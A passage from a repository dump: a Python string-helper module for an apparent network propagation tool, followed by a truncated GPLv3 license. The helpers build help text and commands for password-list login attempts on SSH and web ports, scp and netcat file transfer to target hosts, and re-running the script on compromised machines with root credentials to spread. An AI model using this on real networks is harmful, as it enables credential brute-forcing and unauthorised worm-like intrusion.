445 | '127.0.0.156', '127.0.0.157', '127.0.0.158', '127.0.0.159',
446 | '127.0.0.160', '127.0.0.161', '127.0.0.162', '127.0.0.163',
447 | '127.0.0.164', '127.0.0.165', '127.0.0.166', '127.0.0.167',
448 | '127.0.0.168', '127.0.0.169', '127.0.0.170', '127.0.0.171',
449 | '127.0.0.172', '127.0.0.173', '127.0.0.174', '127.0.0.175',
450 | '127.0.0.176', '127.0.0.177', '127.0.0.178', '127.0.0.179',
451 | '127.0.0.180', '127.0.0.181', '127.0.0.182', '127.0.0.183',
452 | '127.0.0.184', '127.0.0.185', '127.0.0.186', '127.0.0.187',
453 | '127.0.0.188', '127.0.0.189', '127.0.0.190', '127.0.0.191',
454 | '127.0.0.192', '127.0.0.193', '127.0.0.194', '127.0.0.195',
455 | '127.0.0.196', '127.0.0.197', '127.0.0.198', '127.0.0.199',
456 | '127.0.0.200', '127.0.0.201', '127.0.0.202', '127.0.0.203',
457 | '127.0.0.204', '127.0.0.205', '127.0.0.206', '127.0.0.207',
458 | '127.0.0.208', '127.0.0.209', '127.0.0.210', '127.0.0.211',
459 | '127.0.0.212', '127.0.0.213', '127.0.0.214', '127.0.0.215',
460 | '127.0.0.216', '127.0.0.217', '127.0.0.218', '127.0.0.219',
461 | '127.0.0.220', '127.0.0.221', '127.0.0.222', '127.0.0.223',
462 | '127.0.0.224', '127.0.0.225', '127.0.0.226', '127.0.0.227',
463 | '127.0.0.228', '127.0.0.229', '127.0.0.230', '127.0.0.231',
464 | '127.0.0.232', '127.0.0.233', '127.0.0.234', '127.0.0.235',
465 | '127.0.0.236', '127.0.0.237', '127.0.0.238', '127.0.0.239',
466 | '127.0.0.240', '127.0.0.241', '127.0.0.242', '127.0.0.243',
467 | '127.0.0.244', '127.0.0.245', '127.0.0.246', '127.0.0.247',
468 | '127.0.0.248', '127.0.0.249', '127.0.0.250', '127.0.0.251',
469 | '127.0.0.252', '127.0.0.253', '127.0.0.254', '127.0.0.255']
470 |
471 | # The string used for the touch command
472 | TOUCH_COMMAND = "touch"
473 |
474 | # Letting the user know a file couldn't be transferred over SSH default port.
475 | TRANSFER_FAILURE_SSH = "File couldn't be transferred over port 22 / SSH"
476 |
477 | # Letting the user know a file could be transferred over port 22 / SSH default
478 | # ports.
479 | TRANSFER_SUCCESS_SSH = "File transferred over port 22 / SSH"
480 |
481 | # Unsuccessful statement to be used with services and actions.
482 | UNSUCCESSFUL = "Unsuccessful"
483 |
484 | # Help text for the username option.
485 | USERNAME_HELP = "A Username on which we wish to run network propagation " \
486 | "actions against"
487 |
488 | USERNAME_IN_PWS = "using the specified username with a password in the " \
489 | "passwords file."
490 |
491 | # Short option name for the username option.
492 | USERNAME_OPT_SHORT = "-u"
493 |
494 | # Option name for the username option.
495 | USERNAME_OPT_LONG = "--username"
496 |
497 | # The username prompt that comes with web login POST requests.
498 | USERNAME_PROMPT_WEB = "username:"
499 |
500 | # Letting the user know something was found.
501 | WAS_FOUND = "was found."
502 |
503 | # A string stating that something was not reachable
504 | WAS_NOT_REACHABLE = "was not reachable"
505 |
506 | # A string stating that something was reachable
507 | WAS_REACHABLE = "was reachable"
508 |
509 | # Just a web string to define services and actions.
510 | WEB = "web"
511 |
512 | # Just a web login string to define services and actions.
513 | WEB_LOGIN = "web login"
514 |
515 | # Port 80 for web services.
516 | WEB_PORT_EIGHTY = "80"
517 |
518 | # Port 8080 for web services.
519 | WEB_PORT_EIGHTY_EIGHTY = "8080"
520 |
521 | # Port 8888 for web services.
522 | WEB_PORT_EIGHTY_EIGHT_EIGHTY_EIGHT = "8888"
523 |
524 | # Welcome to string, used for a lot of the prompts.
525 | WELCOME_TO = "Welcome to"
526 |
527 | # Letting the user know about a working username and password.
528 | WORKING_USERNAME_PASS = "A working username and password for"
529 |
530 |
531 | def adding_address_to_interface(specific_address, interface):
532 | """
533 | This function takes a specific address and an interface and generates a
534 | string for declaring it was found in a given subnet
535 | :param specific_address: The specific target address to be added to the
536 | interface
537 | :param interface: The interface on which we're adding a specific target
538 | address
539 | :return "Adding " + str(specific_address) + " from interface "
540 | + str(interface) + "'s subnet.": The string in question
541 | """
542 | return ADDING + SPACE + str(specific_address) + SPACE + \
543 | FROM_INTERFACE + SPACE + str(interface) + INTERFACE_SUBNET
544 |
545 |
546 | def arguments_sets(selection):
547 | """
548 | This function contains the all sets of arguments used for testing
549 | purposes
550 | :param selection: The argument being called from the function
551 | :return : The argument selected itself.
552 | """
553 | arguments = {
554 | # This runs the script against all services and four ports
555 | 0: [IP_FILE_OPT_SHORT, IP_LIST_SHORT, PORT_OPT_SHORT,
556 | ALL_PORTS, USERNAME_OPT_SHORT, ADMIN, PW_FILE_OPT_SHORT,
557 | PWDS_LIST_SHORT],
558 | # This just runs the scripts against one port / service
559 | 1: [IP_FILE_OPT_SHORT, IP_LIST_SHORT, PORT_OPT_SHORT,
560 | SSH_PORT, USERNAME_OPT_SHORT, ROOT, PW_FILE_OPT_SHORT,
561 | PWDS_LIST_SHORT],
562 | # This propagates a specific file over SSH
563 | 2: [IP_FILE_OPT_SHORT, IP_LIST_SHORT, PORT_OPT_SHORT,
564 | SSH_PORT, USERNAME_OPT_SHORT, ROOT, PW_FILE_OPT_SHORT,
565 | PWDS_LIST_SHORT, PROP_FILE_OPT_SHORT, FILE],
566 | # This is running the automated propagation feature over SSH.
567 | 3: [LAN_OPT_SHORT, PORT_OPT_SHORT, SSH_PORT,
568 | USERNAME_OPT_SHORT, ROOT, PW_FILE_OPT_SHORT, PWDS_LIST_SHORT,
569 | PROP_OPT_SHORT],
570 |
571 | # This fails to run the script against all services and four ports
572 | # because the passwords file filename is invalid.
573 | 4: [IP_FILE_OPT_SHORT, IP_LIST_SHORT, PORT_OPT_SHORT,
574 | ALL_PORTS, USERNAME_OPT_SHORT, ADMIN, PW_FILE_OPT_SHORT,
575 | FORCE_FAIL],
576 | # This fails to run the scripts against one port / service because the
577 | # OP list filename is invalid.
578 | 5: [IP_FILE_OPT_SHORT, FORCE_FAIL, PORT_OPT_SHORT,
579 | SSH_PORT, USERNAME_OPT_SHORT, ROOT, PW_FILE_OPT_SHORT,
580 | PWDS_LIST_SHORT],
581 | # This fails the propagation of a specific file over SSH because
582 | # parameter misuse.
583 | 6: [IP_FILE_OPT_SHORT, IP_LIST_SHORT, PWDS_LIST_SHORT,
584 | SSH_PORT, USERNAME_OPT_SHORT, ROOT, PW_FILE_OPT_SHORT,
585 | PWDS_LIST_SHORT, PROP_FILE_OPT_SHORT, FILE],
586 | # This fails in general as no arguments are specified.
587 | 7: [FORCE_FAIL, FORCE_FAIL, FORCE_FAIL, FORCE_FAIL, FORCE_FAIL,
588 | FORCE_FAIL, FORCE_FAIL, FORCE_FAIL],
589 | }
590 | return arguments.get(selection, None)
591 |
592 |
593 | def cat_file(filename):
594 | """
595 | This function creates a command for concatenating a specific file
596 | :param filename: The filename of the file we want to touch
597 | :return "cat " + filename: The completed cat command
598 | """
599 | return CAT + SPACE + filename
600 |
601 |
602 | def checking_ip_reachable(ip):
603 | """
604 | This function creates a string that describes the availability of a machine
605 | on a specific IP address
606 | :param ip: The specific IP address
607 | :return "Checking if the following ip address is reachable: " + str(ip):
608 | The string in question
609 | """
610 | return IS_IP_REACHABLE + SPACE + str(ip)
611 |
612 |
613 | def connection_status(service, ip, port, status):
614 | """
615 | This function creates the connection status string dependent
616 | on the context given by the arguments passed into it.
617 | """
618 | return str(status) + SPACE + str(service) + SPACE + LOGIN_TO + SPACE + \
619 | str(ip) + COLON + str(port) + SPACE + USERNAME_IN_PWS
620 |
621 |
622 | def fetching_ips_for_interface(interface):
623 | """
624 | This function generates the string for fetching the IPs for a specific
625 | interface
626 | :param interface: The interface we're fetching IPs on
627 | :return "Fetching IPs for interface " + str(interface) + "...": The string
628 | in question
629 | """
630 | return FETCHING_INTERFACE_IPS + SPACE + str(interface) + ELLIPSES
631 |
632 |
633 | def file_present_on_host(ip):
634 | """
635 | This function generates the string for a file already present on a host
636 | :param ip: The host itself
637 | :return "A file is already present on this host: " + str(ip): The string
638 | in question
639 | """
640 | return FILE_PRESENT_ON_HOST + SPACE + str(ip)
641 |
642 |
643 | def scp_command_string(port, username, target_ip, filename):
644 | """
645 | This function creates and SSH copy string for an OS command
646 | :param port: Port over which we are running the SSH copy
647 | :param username: The username for the SSH login
648 | :param target_ip: The IP address of the machine we are copying too
649 | :param filename: The name of the file to be copied across by SSH
650 | :return: The SSH copy command
651 | """
652 | return SCP_COMMAND + SPACE + str(port) + SPACE + filename + SPACE + \
653 | username + AT_SYMBOL + target_ip + HOME_DIR
654 |
655 |
656 | def touch_file(filename):
657 | """
658 | This function creates a command for touching a specific file
659 | :param filename: The filename of the file we want to touch
660 | :return: The completed touch command
661 | """
662 | return TOUCH_COMMAND + SPACE + filename
663 |
664 |
665 | def ip_list_not_read(filename):
666 | """
667 | This function returns the error for an ip list that can't be generated from
668 | a particular filename
669 | :param filename: The filename of the file that can't have an ip list
670 | derived from it
671 | :return: The string in question
672 | """
673 | return CAN_NOT_READ_IP_LIST + SPACE + filename
674 |
675 |
676 | def ip_reachability(ip, reachable):
677 | """
678 | This function generates the string regarding the reachability of an IP i.e.
679 | whether it can be pinged
680 | :param ip: The IP being pinged
681 | :param reachable: Whether it is reachable
682 | :return str(ip) + " was reachable.": String returned if it is reachable
683 | :return str(ip) + " was not reachable.": String returned if it is not
684 | reachable
685 | """
686 | if reachable:
687 | return str(ip) + SPACE + WAS_REACHABLE + FULL_STOP
688 | return str(ip) + SPACE + WAS_NOT_REACHABLE + FULL_STOP
689 |
690 |
691 | def netcat_listener(port, filename):
692 | """
693 | This function will create a netcat listener on the device we have a netcat
694 | link to
695 | :param port: The port on which the netcat listener will operate
696 | :param filename: The filename of the file we're moving using the listener
697 | parameter
698 | :return: The string in question
699 | """
700 | return NETCAT_LISTENER_PORT_COMMAND + SPACE + str(port) + SPACE + \
701 | GREATER_THAN + SPACE + filename
702 |
703 |
704 | def netcat_writer(ip, port, filename):
705 | """
706 | This function will create a netcat writer to write a file to a device we
707 | have a netcat link to
708 | :param ip: Machine with the netcat listener we are writing to
709 | :param port: The port on which the netcat writer will operate
710 | :param filename: The filename of the file we're moving using the writer
711 | parameter
712 | :return: The string in question
713 | """
714 | return NETCAT_WRITER_COMMAND + SPACE + str(ip) + SPACE + str(port) + \
715 | SPACE + LESS_THAN + SPACE + filename
716 |
717 |
718 | def help_output():
719 | """
720 | This is the help output for when the user passes in the help parameter
721 | :return: The output itself.
722 | """
723 | return PARAMETERS + NEWLINE_TAB + IP_FILE_OPT_SHORT + SPACE + \
724 | ARROW + SPACE + FILENAME_LIST_IP_ADDRESSES + NEWLINE_TAB + \
725 | PORT_OPT_SHORT + SPACE + ARROW + SPACE + PORTS_TO_SCAN + \
726 | NEWLINE_TAB + USERNAME_OPT_SHORT + SPACE + ARROW + SPACE + \
727 | A_USERNAME + NEWLINE_TAB + PW_FILE_OPT_SHORT + SPACE + ARROW + \
728 | SPACE + FILENAME_PWS_FILE + NEWLINE_TAB + \
729 | LAN_OPT_SHORT + SPACE + ARROW + SPACE + \
730 | LOCAL_SCAN_STRING_HELP + NEWLINE_TAB + PROP_OPT_SHORT + SPACE + \
731 | ARROW + SPACE + HELP_STRING_PROPAGATION + NEWLINE + EXAMPLE_USAGE + \
732 | NEWLINE_TAB + DEMO_SCRIPT_PATH + SPACE + \
733 | IP_FILE_OPT_SHORT + SPACE + IP_LIST + SPACE + \
734 | PORT_OPT_SHORT + SPACE + ALL_PORTS + SPACE + USERNAME_OPT_SHORT + \
735 | SPACE + ADMIN + SPACE + PW_FILE_OPT_SHORT + SPACE + PWDS_LIST + \
736 | NEWLINE_NEWLINE_TAB + DEMO_SCRIPT_PATH + \
737 | IP_FILE_OPT_SHORT + SPACE + IP_LIST + SPACE + \
738 | PORT_OPT_SHORT + SPACE + SSH_PORT + SPACE + USERNAME_OPT_SHORT + \
739 | SPACE + ROOT + SPACE + PW_FILE_OPT_SHORT + SPACE + PWDS_LIST
740 |
741 |
742 | def run_script_command():
743 | """
744 | This function will run the propagation script on another target machine
745 | over any service
746 | :return: The command itself
747 | """
748 | return DEMO_SCRIPT_PATH + SPACE + LAN_OPT_SHORT + SPACE + \
749 | PORT_OPT_SHORT + SPACE + SSH_PORT + SPACE + USERNAME_OPT_SHORT + \
750 | SPACE + ROOT + SPACE + PW_FILE_OPT_SHORT + PWDS_LIST + SPACE + \
751 | PROP_OPT_SHORT
752 |
753 |
754 | def web_login_url(ip, port):
755 | """
756 | This function will build the web login url string
757 | :param ip: The IP of the machine running the web service
758 | :param port: The port the web service is running on
759 | :return: The string itself
760 | """
761 | return HTTPS_STRING + ip + COLON + port + LOGIN_PHP
762 |
763 |
764 | def working_username_password(service):
765 | """
766 | This function will build a string for a working username and password given
767 | a specific service
768 | :param service: Service for which there is a working username and password
769 | combination
770 | :return: The string itself
771 | """
772 | return WORKING_USERNAME_PASS + SPACE + str(service) + SPACE + WAS_FOUND
773 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | GNU GENERAL PUBLIC LICENSE
2 | Version 3, 29 June 2007
3 |
4 | Copyright (C) 2007 Free Software Foundation, Inc.
5 | Everyone is permitted to copy and distribute verbatim copies
6 | of this license document, but changing it is not allowed.
7 |
8 | Preamble
9 |
10 | The GNU General Public License is a free, copyleft license for
11 | software and other kinds of works.
12 |
13 | The licenses for most software and other practical works are designed
14 | to take away your freedom to share and change the works. By contrast,
15 | the GNU General Public License is intended to guarantee your freedom to
16 | share and change all versions of a program--to make sure it remains free
17 | software for all its users. We, the Free Software Foundation, use the
18 | GNU General Public License for most of our software; it applies also to
19 | any other work released this way by its authors. You can apply it to
20 | your programs, too.
21 |
22 | When we speak of free software, we are referring to freedom, not
23 | price. Our General Public Licenses are designed to make sure that you
24 | have the freedom to distribute copies of free software (and charge for
25 | them if you wish), that you receive source code or can get it if you
26 | want it, that you can change the software or use pieces of it in new
27 | free programs, and that you know you can do these things.
28 |
29 | To protect your rights, we need to prevent others from denying you
30 | these rights or asking you to surrender the rights. Therefore, you have
31 | certain responsibilities if you distribute copies of the software, or if
32 | you modify it: responsibilities to respect the freedom of others.
33 |
34 | For example, if you distribute copies of such a program, whether
35 | gratis or for a fee, you must pass on to the recipients the same
36 | freedoms that you received. You must make sure that they, too, receive
37 | or can get the source code. And you must show them these terms so they
38 | know their rights.
39 |
40 | Developers that use the GNU GPL protect your rights with two steps:
41 | (1) assert copyright on the software, and (2) offer you this License
42 | giving you legal permission to copy, distribute and/or modify it.
43 |
44 | For the developers' and authors' protection, the GPL clearly explains
45 | that there is no warranty for this free software. For both users' and
46 | authors' sake, the GPL requires that modified versions be marked as
47 | changed, so that their problems will not be attributed erroneously to
48 | authors of previous versions.
49 |
50 | Some devices are designed to deny users access to install or run
51 | modified versions of the software inside them, although the manufacturer
52 | can do so. This is fundamentally incompatible with the aim of
53 | protecting users' freedom to change the software. The systematic
54 | pattern of such abuse occurs in the area of products for individuals to
55 | use, which is precisely where it is most unacceptable. Therefore, we
56 | have designed this version of the GPL to prohibit the practice for those
57 | products. If such problems arise substantially in other domains, we
58 | stand ready to extend this provision to those domains in future versions
59 | of the GPL, as needed to protect the freedom of users.
60 |
61 | Finally, every program is threatened constantly by software patents.
62 | States should not allow patents to restrict development and use of
63 | software on general-purpose computers, but in those that do, we wish to
64 | avoid the special danger that patents applied to a free program could
65 | make it effectively proprietary. To prevent this, the GPL assures that
66 | patents cannot be used to render the program non-free.
67 |
68 | The precise terms and conditions for copying, distribution and
69 | modification follow.
70 |
71 | TERMS AND CONDITIONS
72 |
73 | 0. Definitions.
74 |
75 | "This License" refers to version 3 of the GNU General Public License.
76 |
77 | "Copyright" also means copyright-like laws that apply to other kinds of
78 | works, such as semiconductor masks.
79 |
80 | "The Program" refers to any copyrightable work licensed under this
81 | License. Each licensee is addressed as "you". "Licensees" and
82 | "recipients" may be individuals or organizations.
83 |
84 | To "modify" a work means to copy from or adapt all or part of the work
85 | in a fashion requiring copyright permission, other than the making of an
86 | exact copy. The resulting work is called a "modified version" of the
87 | earlier work or a work "based on" the earlier work.
88 |
89 | A "covered work" means either the unmodified Program or a work based
90 | on the Program.
91 |
92 | To "propagate" a work means to do anything with it that, without
93 | permission, would make you directly or secondarily liable for
94 | infringement under applicable copyright law, except executing it on a
95 | computer or modifying a private copy. Propagation includes copying,
96 | distribution (with or without modification), making available to the
97 | public, and in some countries other activities as well.
98 |
99 | To "convey" a work means any kind of propagation that enables other
100 | parties to make or receive copies. Mere interaction with a user through
101 | a computer network, with no transfer of a copy, is not conveying.
102 |
103 | An interactive user interface displays "Appropriate Legal Notices"
104 | to the extent that it includes a convenient and prominently visible
105 | feature that (1) displays an appropriate copyright notice, and (2)
106 | tells the user that there is no warranty for the work (except to the
107 | extent that warranties are provided), that licensees may convey the
108 | work under this License, and how to view a copy of this License. If
109 | the interface presents a list of user commands or options, such as a
110 | menu, a prominent item in the list meets this criterion.
111 |
112 | 1. Source Code.
113 |
114 | The "source code" for a work means the preferred form of the work
115 | for making modifications to it. "Object code" means any non-source
116 | form of a work.
117 |
118 | A "Standard Interface" means an interface that either is an official
119 | standard defined by a recognized standards body, or, in the case of
120 | interfaces specified for a particular programming language, one that
121 | is widely used among developers working in that language.
122 |
123 | The "System Libraries" of an executable work include anything, other
124 | than the work as a whole, that (a) is included in the normal form of
125 | packaging a Major Component, but which is not part of that Major
126 | Component, and (b) serves only to enable use of the work with that
127 | Major Component, or to implement a Standard Interface for which an
128 | implementation is available to the public in source code form. A
129 | "Major Component", in this context, means a major essential component
130 | (kernel, window system, and so on) of the specific operating system
131 | (if any) on which the executable work runs, or a compiler used to
132 | produce the work, or an object code interpreter used to run it.
133 |
134 | The "Corresponding Source" for a work in object code form means all
135 | the source code needed to generate, install, and (for an executable
136 | work) run the object code and to modify the work, including scripts to
137 | control those activities. However, it does not include the work's
138 | System Libraries, or general-purpose tools or generally available free
139 | programs which are used unmodified in performing those activities but
140 | which are not part of the work. For example, Corresponding Source
141 | includes interface definition files associated with source files for
142 | the work, and the source code for shared libraries and dynamically
143 | linked subprograms that the work is specifically designed to require,
144 | such as by intimate data communication or control flow between those
145 | subprograms and other parts of the work.
146 |
147 | The Corresponding Source need not include anything that users
148 | can regenerate automatically from other parts of the Corresponding
149 | Source.
150 |
151 | The Corresponding Source for a work in source code form is that
152 | same work.
153 |
154 | 2. Basic Permissions.
155 |
156 | All rights granted under this License are granted for the term of
157 | copyright on the Program, and are irrevocable provided the stated
158 | conditions are met. This License explicitly affirms your unlimited
159 | permission to run the unmodified Program. The output from running a
160 | covered work is covered by this License only if the output, given its
161 | content, constitutes a covered work. This License acknowledges your
162 | rights of fair use or other equivalent, as provided by copyright law.
163 |
164 | You may make, run and propagate covered works that you do not
165 | convey, without conditions so long as your license otherwise remains
166 | in force. You may convey covered works to others for the sole purpose
167 | of having them make modifications exclusively for you, or provide you
168 | with facilities for running those works, provided that you comply with
169 | the terms of this License in conveying all material for which you do
170 | not control copyright. Those thus making or running the covered works
171 | for you must do so exclusively on your behalf, under your direction
172 | and control, on terms that prohibit them from making any copies of
173 | your copyrighted material outside their relationship with you.
174 |
175 | Conveying under any other circumstances is permitted solely under
176 | the conditions stated below. Sublicensing is not allowed; section 10
177 | makes it unnecessary.
178 |
179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law.
180 |
181 | No covered work shall be deemed part of an effective technological
182 | measure under any applicable law fulfilling obligations under article
183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or
184 | similar laws prohibiting or restricting circumvention of such
185 | measures.
186 |
187 | When you convey a covered work, you waive any legal power to forbid
188 | circumvention of technological measures to the extent such circumvention
189 | is effected by exercising rights under this License with respect to
190 | the covered work, and you disclaim any intention to limit operation or
191 | modification of the work as a means of enforcing, against the work's
192 | users, your or third parties' legal rights to forbid circumvention of
193 | technological measures.
194 |
195 | 4. Conveying Verbatim Copies.
196 |
197 | You may convey verbatim copies of the Program's source code as you
198 | receive it, in any medium, provided that you conspicuously and
199 | appropriately publish on each copy an appropriate copyright notice;
200 | keep intact all notices stating that this License and any
201 | non-permissive terms added in accord with section 7 apply to the code;
202 | keep intact all notices of the absence of any warranty; and give all
203 | recipients a copy of this License along with the Program.
204 |
205 | You may charge any price or no price for each copy that you convey,
206 | and you may offer support or warranty protection for a fee.
207 |
208 | 5. Conveying Modified Source Versions.
209 |
210 | You may convey a work based on the Program, or the modifications to
211 | produce it from the Program, in the form of source code under the
212 | terms of section 4, provided that you also meet all of these conditions:
213 |
214 | a) The work must carry prominent notices stating that you modified
215 | it, and giving a relevant date.
216 |
217 | b) The work must carry prominent notices stating that it is
218 | released under this License and any conditions added under section
219 | 7. This requirement modifies the requirement in section 4 to
220 | "keep intact all notices".
221 |
222 | c) You must license the entire work, as a whole, under this
223 | License to anyone who comes into possession of a copy. This
224 | License will therefore apply, along with any applicable section 7
225 | additional terms, to the whole of the work, and all its parts,
226 | regardless of how they are packaged. This License gives no
227 | permission to license the work in any other way, but it does not
228 | invalidate such permission if you have separately received it.
229 |
230 | d) If the work has interactive user interfaces, each must display
231 | Appropriate Legal Notices; however, if the Program has interactive
232 | interfaces that do not display Appropriate Legal Notices, your
233 | work need not make them do so.
234 |
235 | A compilation of a covered work with other separate and independent
236 | works, which are not by their nature extensions of the covered work,
237 | and which are not combined with it such as to form a larger program,
238 | in or on a volume of a storage or distribution medium, is called an
239 | "aggregate" if the compilation and its resulting copyright are not
240 | used to limit the access or legal rights of the compilation's users
241 | beyond what the individual works permit. Inclusion of a covered work
242 | in an aggregate does not cause this License to apply to the other
243 | parts of the aggregate.
244 |
245 | 6. Conveying Non-Source Forms.
246 |
247 | You may convey a covered work in object code form under the terms
248 | of sections 4 and 5, provided that you also convey the
249 | machine-readable Corresponding Source under the terms of this License,
250 | in one of these ways:
251 |
252 | a) Convey the object code in, or embodied in, a physical product
253 | (including a physical distribution medium), accompanied by the
254 | Corresponding Source fixed on a durable physical medium
255 | customarily used for software interchange.
256 |
257 | b) Convey the object code in, or embodied in, a physical product
258 | (including a physical distribution medium), accompanied by a
259 | written offer, valid for at least three years and valid for as
260 | long as you offer spare parts or customer support for that product
261 | model, to give anyone who possesses the object code either (1) a
262 | copy of the Corresponding Source for all the software in the
263 | product that is covered by this License, on a durable physical
264 | medium customarily used for software interchange, for a price no
265 | more than your reasonable cost of physically performing this
266 | conveying of source, or (2) access to copy the
267 | Corresponding Source from a network server at no charge.
268 |
269 | c) Convey individual copies of the object code with a copy of the
270 | written offer to provide the Corresponding Source. This
271 | alternative is allowed only occasionally and noncommercially, and
272 | only if you received the object code with such an offer, in accord
273 | with subsection 6b.
274 |
275 | d) Convey the object code by offering access from a designated
276 | place (gratis or for a charge), and offer equivalent access to the
277 | Corresponding Source in the same way through the same place at no
278 | further charge. You need not require recipients to copy the
279 | Corresponding Source along with the object code. If the place to
280 | copy the object code is a network server, the Corresponding Source
281 | may be on a different server (operated by you or a third party)
282 | that supports equivalent copying facilities, provided you maintain
283 | clear directions next to the object code saying where to find the
284 | Corresponding Source. Regardless of what server hosts the
285 | Corresponding Source, you remain obligated to ensure that it is
286 | available for as long as needed to satisfy these requirements.
287 |
288 | e) Convey the object code using peer-to-peer transmission, provided
289 | you inform other peers where the object code and Corresponding
290 | Source of the work are being offered to the general public at no
291 | charge under subsection 6d.
292 |
293 | A separable portion of the object code, whose source code is excluded
294 | from the Corresponding Source as a System Library, need not be
295 | included in conveying the object code work.
296 |
297 | A "User Product" is either (1) a "consumer product", which means any
298 | tangible personal property which is normally used for personal, family,
299 | or household purposes, or (2) anything designed or sold for incorporation
300 | into a dwelling. In determining whether a product is a consumer product,
301 | doubtful cases shall be resolved in favor of coverage. For a particular
302 | product received by a particular user, "normally used" refers to a
303 | typical or common use of that class of product, regardless of the status
304 | of the particular user or of the way in which the particular user
305 | actually uses, or expects or is expected to use, the product. A product
306 | is a consumer product regardless of whether the product has substantial
307 | commercial, industrial or non-consumer uses, unless such uses represent
308 | the only significant mode of use of the product.
309 |
310 | "Installation Information" for a User Product means any methods,
311 | procedures, authorization keys, or other information required to install
312 | and execute modified versions of a covered work in that User Product from
313 | a modified version of its Corresponding Source. The information must
314 | suffice to ensure that the continued functioning of the modified object
315 | code is in no case prevented or interfered with solely because
316 | modification has been made.
317 |
318 | If you convey an object code work under this section in, or with, or
319 | specifically for use in, a User Product, and the conveying occurs as
320 | part of a transaction in which the right of possession and use of the
321 | User Product is transferred to the recipient in perpetuity or for a
322 | fixed term (regardless of how the transaction is characterized), the
323 | Corresponding Source conveyed under this section must be accompanied
324 | by the Installation Information. But this requirement does not apply
325 | if neither you nor any third party retains the ability to install
326 | modified object code on the User Product (for example, the work has
327 | been installed in ROM).
328 |
329 | The requirement to provide Installation Information does not include a
330 | requirement to continue to provide support service, warranty, or updates
331 | for a work that has been modified or installed by the recipient, or for
332 | the User Product in which it has been modified or installed. Access to a
333 | network may be denied when the modification itself materially and
334 | adversely affects the operation of the network or violates the rules and
335 | protocols for communication across the network.
336 |
337 | Corresponding Source conveyed, and Installation Information provided,
338 | in accord with this section must be in a format that is publicly
339 | documented (and with an implementation available to the public in
340 | source code form), and must require no special password or key for
341 | unpacking, reading or copying.
342 |
343 | 7. Additional Terms.
344 |
345 | "Additional permissions" are terms that supplement the terms of this
346 | License by making exceptions from one or more of its conditions.
347 | Additional permissions that are applicable to the entire Program shall
348 | be treated as though they were included in this License, to the extent
349 | that they are valid under applicable law. If additional permissions
350 | apply only to part of the Program, that part may be used separately
351 | under those permissions, but the entire Program remains governed by
352 | this License without regard to the additional permissions.
353 |
354 | When you convey a copy of a covered work, you may at your option
355 | remove any additional permissions from that copy, or from any part of
356 | it. (Additional permissions may be written to require their own
357 | removal in certain cases when you modify the work.) You may place
358 | additional permissions on material, added by you to a covered work,
359 | for which you have or can give appropriate copyright permission.
360 |
361 | Notwithstanding any other provision of this License, for material you
362 | add to a covered work, you may (if authorized by the copyright holders of
363 | that material) supplement the terms of this License with terms:
364 |
365 | a) Disclaiming warranty or limiting liability differently from the
366 | terms of sections 15 and 16 of this License; or
367 |
368 | b) Requiring preservation of specified reasonable legal notices or
369 | author attributions in that material or in the Appropriate Legal
370 | Notices displayed by works containing it; or
371 |
372 | c) Prohibiting misrepresentation of the origin of that material, or
373 | requiring that modified versions of such material be marked in
374 | reasonable ways as different from the original version; or
375 |
376 | d) Limiting the use for publicity purposes of names of licensors or
377 | authors of the material; or
378 |
379 | e) Declining to grant rights under trademark law for use of some
380 | trade names, trademarks, or service marks; or
381 |
382 | f) Requiring indemnification of licensors and authors of that
383 | material by anyone who conveys the material (or modified versions of
384 | it) with contractual assumptions of liability to the recipient, for
385 | any liability that these contractual assumptions directly impose on
386 | those licensors and authors.
387 |
388 | All other non-permissive additional terms are considered "further
389 | restrictions" within the meaning of section 10. If the Program as you
390 | received it, or any part of it, contains a notice stating that it is
391 | governed by this License along with a term that is a further
392 | restriction, you may remove that term. If a license document contains
393 | a further restriction but permits relicensing or conveying under this
394 | License, you may add to a covered work material governed by the terms
395 | of that license document, provided that the further restriction does
396 | not survive such relicensing or conveying.
397 |
398 | If you add terms to a covered work in accord with this section, you
399 | must place, in the relevant source files, a statement of the
400 | additional terms that apply to those files, or a notice indicating
401 | where to find the applicable terms.
402 |
403 | Additional terms, permissive or non-permissive, may be stated in the
404 | form of a separately written license, or stated as exceptions;
405 | the above requirements apply either way.
406 |
407 | 8. Termination.
408 |
409 | You may not propagate or modify a covered work except as expressly
410 | provided under this License. Any attempt otherwise to propagate or
411 | modify it is void, and will automatically terminate your rights under
412 | this License (including any patent licenses granted under the third
413 | paragraph of section 11).
414 |
415 | However, if you cease all violation of this License, then your
416 | license from a particular copyright holder is reinstated (a)
417 | provisionally, unless and until the copyright holder explicitly and
418 | finally terminates your license, and (b) permanently, if the copyright
419 | holder fails to notify you of the violation by some reasonable means
420 | prior to 60 days after the cessation.
421 |
422 | Moreover, your license from a particular copyright holder is
423 | reinstated permanently if the copyright holder notifies you of the
424 | violation by some reasonable means, this is the first time you have
425 | received notice of violation of this License (for any work) from that
426 | copyright holder, and you cure the violation prior to 30 days after
427 | your receipt of the notice.
428 |
429 | Termination of your rights under this section does not terminate the
430 | licenses of parties who have received copies or rights from you under
431 | this License. If your rights have been terminated and not permanently
432 | reinstated, you do not qualify to receive new licenses for the same
433 | material under section 10.
434 |
435 | 9. Acceptance Not Required for Having Copies.
436 |
437 | You are not required to accept this License in order to receive or
438 | run a copy of the Program. Ancillary propagation of a covered work
439 | occurring solely as a consequence of using peer-to-peer transmission
440 | to receive a copy likewise does not require acceptance. However,
441 | nothing other than this License grants you permission to propagate or
442 | modify any covered work. These actions infringe copyright if you do
443 | not accept this License. Therefore, by modifying or propagating a
444 | covered work, you indicate your acceptance of this License to do so.
445 |
446 | 10. Automatic Licensing of Downstream Recipients.
447 |
448 | Each time you convey a covered work, the recipient automatically
449 | receives a license from the original licensors, to run, modify and
450 | propagate that work, subject to this License. You are not responsible
451 | for enforcing compliance by third parties with this License.
452 |
453 | An "entity transaction" is a transaction transferring control of an
454 | organization, or substantially all assets of one, or subdividing an
455 | organization, or merging organizations. If propagation of a covered
456 | work results from an entity transaction, each party to that
457 | transaction who receives a copy of the work also receives whatever
458 | licenses to the work the party's predecessor in interest had or could
459 | give under the previous paragraph, plus a right to possession of the
460 | Corresponding Source of the work from the predecessor in interest, if
461 | the predecessor has it or can get it with reasonable efforts.
462 |
463 | You may not impose any further restrictions on the exercise of the
464 | rights granted or affirmed under this License. For example, you may
465 | not impose a license fee, royalty, or other charge for exercise of
466 | rights granted under this License, and you may not initiate litigation
